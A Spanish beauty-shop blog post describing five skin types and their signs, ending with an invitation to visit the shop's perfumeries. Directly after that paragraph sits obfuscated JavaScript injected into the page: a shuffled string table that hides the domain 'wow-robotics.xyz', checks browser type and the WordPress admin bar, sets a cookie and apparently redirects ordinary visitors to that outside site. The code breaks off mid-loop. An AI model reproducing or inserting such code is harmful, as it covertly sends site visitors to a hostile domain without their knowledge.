Es importante conocer qué tipo de piel tenemos, para poder elegir los productos de tratamiento adecuados. A continuación os doy algunos consejos para descubrir cual es tu tipo de piel:

PIEL SECA: Se asocia con una disfunción de la producción de lípidos a nivel de la epidermis. El poro es liso y fino y el aspecto de la piel es mate. Suele presentar constantes sensaciones de incomodidad, sequedad, tirantez sobre todo el rostro, irritación, sensibilidad cutánea, aparición de pequeñas arrugas y piel áspera.

PIEL MIXTA Y GRASA: Se caracteriza por producir demasiado sebo. Es genética, pero también puede deberse a factores internos como cambios hormonales, y factores externos como un clima cálido y/o húmedo. Este tipo de piel, se debe a una sobreproducción de sebo, que se traduce en una piel brillante principalmente en la zona media del rostro. El poro se ve dilatado, con imperfecciones cutáneas (puntos negros, espinillas, irritaciones localizadas) y una tez apagada.

PIEL NORMAL: No presenta ninguno de los desequilibrios propios de las pieles secas o grasas, sino que el aspecto es mate y luminoso y la piel está radiante sin tensiones, ni brillos.

PIEL DESHIDRATADA: Experimenta carencia de agua y todos los tipos de piel pueden sentirse así, al menos ocasionalmente. Se nota una sensación constante de incomodidad y tiranteces localizadas u ocasionales, pequeñas arrugas y aspereza de la piel en las zonas deshidratadas. La tez está apagada y carente de luminosidad.

PIEL SENSIBLE: La sensibilidad cutánea afecta a todos los tipos de piel. La piel puede ser sensible de nacimiento, o haberse debilitado con el paso de los años. Este tipo de piel puede resultar dolorosa y con presencia de rojeces difusas, que pueden aparecer de manera sistemática o en contacto con el agua, con el estrés o con los cambios climáticos.

Para poder realizar un diagnóstico completo de su tipo de piel, le invitamos a que se acerque a cualquiera de nuestras perfumerías donde una asesora de belleza le aconsejará. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone